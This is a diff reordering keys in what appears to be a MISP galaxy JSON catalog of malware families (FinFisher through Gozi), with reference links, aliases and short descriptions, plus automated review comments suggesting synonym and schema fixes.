@@ -6526,97 +6526,99 @@ "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" - ] + ], + "synonyms": [ + "FinSpy" + ], + "type": [] }, "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", - "value": "FinFisher RAT", - "description": "" + "value": "FinFisher RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball", "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", - "value": "Fireball", - "description": "" + "value": "Fireball" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt", "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", - "value": "FireCrypt", - "description": "" + "value": "FireCrypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", - "value": "FireMalv", - "description": "" + "value": "FireMalv" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom", "https://twitter.com/JaromirHorejsi/status/815949909648150528" - ] + ], + "synonyms": [], + 
"type": [] }, "uuid": "1ab17959-6254-49af-af26-d34e87073e49", - "value": "FirstRansom", - "description": "" + "value": "FirstRansom" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", "https://github.com/Coldzer0/Ammyy-v3", "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", - "value": "FlawedAmmyy", - "description": "" + "value": "FlawedAmmyy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "" + "value": "FlexiSpy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", 
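Review bot: Several entries in this hunk (Fireball, FireCrypt, FireMalv, FirstRansom, FlawedAmmyy, FlexiSpy) now carry `"description": ""` together with `"synonyms": []` and `"type": []`, so "unknown" is encoded three different ways as empty sentinels rather than by omitting the key. If the galaxy schema permits omitting these keys (I cannot see the schema from here), dropping them would let consumers distinguish "no description known" from "description intentionally blank" and would shrink the file; if the schema requires them, a one-line note in the repo's contribution docs saying that empty values are the convention would save future reviewers the same question. The reorder itself is mechanical and looks correct; no `uuid`/`value` pairs were lost.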
@@ -6627,42 +6629,42 @@ "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", - "value": "FlokiBot", - "description": "" + "value": "FlokiBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", - "value": "Floxif", - "description": "" + "value": "Floxif" }, { + "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc", "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", - "value": "Flusihoc", - "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text." + "value": "Flusihoc" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", 
@@ -6670,16 +6672,16 @@ "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", - "value": "Fobber", - "description": "" + "value": "Fobber" }, { + "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", 
@@ -6689,116 +6691,113 @@ "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", - "value": "Formbook", - "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware." + "value": "Formbook" }, { + "description": "", "meta": { - "synonyms": [ - "ffrat" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" - ] + ], + "synonyms": [ + "ffrat" + ], + "type": [] }, "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", - "value": "FormerFirstRAT", - "description": "" + "value": "FormerFirstRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", - "value": "Freenki Loader", - "description": "" + "value": "Freenki Loader" }, { + "description": "", "meta": { - "synonyms": [ - "BitPaymer" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] + ], + "synonyms": [ + "BitPaymer" + ], + "type": [] }, "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", - "value": "FriedEx", - "description": "" + "value": 
"FriedEx" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f", "https://sentinelone.com/blogs/sfg-furtims-parent/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", - "value": "Furtim", - "description": "" + "value": "Furtim" }, { + "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", - "value": "GalaxyLoader", - "description": "GalaxyLoader is a simple .NET loader. 
Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n" + "value": "GalaxyLoader" }, { + "description": "", "meta": { - "synonyms": [ - "pios" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos", "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" - ] + ], + "synonyms": [ + "pios" + ], + "type": [] }, "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", - "value": "gamapos", - "description": "" + "value": "gamapos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", - "value": "Gameover DGA", - "description": "" + "value": "Gameover DGA" }, { + "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.", "meta": { - "synonyms": [ - "ZeuS P2P", - "GOZ" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", "https://www.wired.com/?p=2171700", 
@@ -6806,30 +6805,31 @@ "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf" - ] + ], + "synonyms": [ + "ZeuS P2P", + "GOZ" + ], + "type": [] }, "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", - "value": "Gameover P2P", - "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers." + "value": "Gameover P2P" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded", - "value": "Gamotrol", - "description": "" + "value": "Gamotrol" }, { + "description": "", "meta": { - "synonyms": [ - "GrandCrab" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", 
@@ -6842,44 +6842,44 @@ "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/" - ] + ], + "synonyms": [ + "GrandCrab" + ], + "type": [] }, "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", - "value": "win.gandcrab", - "description": "" + "value": "win.gandcrab" }, { + "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox", "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "591b2882-65ba-4629-9008-51ed3467510a", - "value": "Gaudox", - "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only)." + "value": "Gaudox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss", "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691", - "value": "Gauss", - "description": "" + "value": "Gauss" }, { + "description": "", "meta": { - "synonyms": [ - "WhiteBear" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", 
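Review bot: The GandCrab entry keeps `"value": "win.gandcrab"` (the Malpedia slug) while its only synonym is `"GrandCrab"`, so a lookup by the name every ref in this hunk uses ("gandcrab", "GandCrabv5") matches nothing, and the key sort this commit applies leaves that gap in place. Since `value` presumably doubles as the tag string on existing MISP instances, renaming it would break those tags, so the safer fix is to add the canonical spelling alongside the vendor misspelling: `"synonyms": [ "GrandCrab", "GandCrab" ]`. The same slug-as-value pattern is worth a quick check across the rest of this file, since most sibling entries here use a human-readable family name as `value`.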
@@ -6887,46 +6887,45 @@ "https://www.youtube.com/watch?v=Pvzhtjl86wc", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", "https://github.com/eset/malware-ioc/tree/master/turla" - ] + ], + "synonyms": [ + "WhiteBear" + ], + "type": [] }, "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", - "value": "Gazer", - "description": "" + "value": "Gazer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman", "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e", - "value": "gcman", - "description": "" + "value": "gcman" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html", "https://www.rekings.com/ispy-customers/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", - "value": "GearInformer", - "description": "" + "value": "GearInformer" }, { + "description": "", "meta": { - "synonyms": [ - "Emotet", - "Heodo" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", 
@@ -6945,99 +6944,99 @@ "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" - ] + ], + "synonyms": [ + "Emotet", + "Heodo" + ], + "type": [] }, "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", - "value": "Geodo", - "description": "" + "value": "Geodo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", - "value": "GetMail", - "description": "" + "value": "GetMail" }, { + "description": "", "meta": { - "synonyms": [ - "getmypos" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html" - ] + ], + "synonyms": [ + "getmypos" + ], + "type": [] }, "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", - "value": "GetMyPass", - "description": "" + "value": "GetMyPass" }, { + "description": "", "meta": { - "synonyms": [ - "CoreImpact (Modified)" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", 
"https://www.coresecurity.com/core-impact" - ] + ], + "synonyms": [ + "CoreImpact (Modified)" + ], + "type": [] }, "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", - "value": "Ghole", - "description": "" + "value": "Ghole" }, { + "description": "", "meta": { - "synonyms": [ - "Remosh" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", "https://en.wikipedia.org/wiki/GhostNet" - ] + ], + "synonyms": [ + "Remosh" + ], + "type": [] }, "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", - "value": "Gh0stnet", - "description": "" + "value": "Gh0stnet" }, { + "description": "", "meta": { - "synonyms": [ - "Ghost iBot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" - ] + ], + "synonyms": [ + "Ghost iBot" + ], + "type": [] }, "uuid": "6201c337-1599-4ced-be9e-651a624c20be", - "value": "GhostAdmin", - "description": "" + "value": "GhostAdmin" }, { + "description": "", "meta": { - "synonyms": [ - "PCRat", - "Gh0st RAT" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", 
@@ -7048,44 +7047,47 @@ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "http://www.hexblog.com/?p=1248", "https://blog.cylance.com/the-ghost-dragon" - ] + ], + "synonyms": [ + "PCRat", + "Gh0st RAT" + ], + "type": [] }, "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", - "value": "Ghost RAT", - "description": "" + "value": "Ghost RAT" }, { + "description": "", "meta": { - "synonyms": [ - "Wordpress Bruteforcer" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", "https://forum.exploit.in/pda/index.php/t102378.html" - ] + ], + "synonyms": [ + "Wordpress Bruteforcer" + ], + "type": [] }, "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", - "value": "Glasses", - "description": "" + "value": "Glasses" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", - "value": "GlassRAT", - "description": "" + "value": "GlassRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", "https://blog.ensilo.com/globeimposter-ransomware-technical", 
@@ -7094,41 +7096,41 @@ "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", "https://isc.sans.edu/diary/23417" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", - "value": "GlobeImposter", - "description": "" + "value": "GlobeImposter" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", - "value": "Globe", - "description": "" + "value": "Globe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", - "value": "GlooxMail", - "description": "" + "value": "GlooxMail" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", 
@@ -7136,129 +7138,126 @@ "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/", "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", "http://resources.infosecinstitute.com/tdss4-part-1/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", - "value": "win.glupteba", - "description": "" + "value": "win.glupteba" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", - "value": "Godzilla Loader", - "description": "" + "value": "Godzilla Loader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", - "value": "Goggles", - "description": "" + "value": "Goggles" }, { + "description": "", "meta": { - "synonyms": [ - "Petya/Mischa" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html", "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" - ] + ], + "synonyms": [ + "Petya/Mischa" + ], + "type": [] }, "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", - "value": "GoldenEye", - "description": "" + "value": "GoldenEye" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", 
"https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", - "value": "GoldDragon", - "description": "" + "value": "GoldDragon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", - "value": "Golroted", - "description": "" + "value": "Golroted" }, { + "description": "", "meta": { - "synonyms": [ - "Fuerboos" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" - ] + ], + "synonyms": [ + "Fuerboos" + ], + "type": [] }, "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", - "value": "Goodor", - "description": "" + "value": "Goodor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d1298818-6425-49be-9764-9f119d964efd", - "value": "GoogleDrive RAT", - "description": "" + "value": "GoogleDrive RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", - "value": "GooPic Drooper", - "description": "" + "value": "GooPic Drooper" }, { + "description": 
"Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks.", "meta": { - "synonyms": [ - "talalpek", - "Xswkit" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", 
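Review bot: The Glupteba entry has `"value": "win.glupteba"` and `"synonyms": []`, so there is no human-readable name at all to match against, even though the refs in this hunk name the family plainly (the welivesecurity "glupteba-no-longer-windigo" post); the commit only reorders the keys and does not fill this in. Renaming `value` may break tags already applied on MISP instances, so I would keep the slug and add the family name as a synonym: `"synonyms": [ "Glupteba" ]`. As a point of style, entries in this hunk that have no known aliases (GoldDragon, Golroted, GoogleDrive RAT) still carry `"synonyms": []` and `"type": []`, which is fine if the galaxy schema requires the keys, but worth confirming since empty-array sentinels otherwise add no information.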
@@ -7277,35 +7276,32 @@ "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/", "https://www.youtube.com/watch?v=QgUlPvEE4aw", "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" - ] + ], + "synonyms": [ + "talalpek", + "Xswkit" + ], + "type": [] }, "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", - "value": "GootKit", - "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks." + "value": "GootKit" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", "https://www.yumpu.com/en/document/view/55930175/govrat-v20" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", - "value": "GovRAT", - "description": "" + "value": "GovRAT" }, { + "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). 
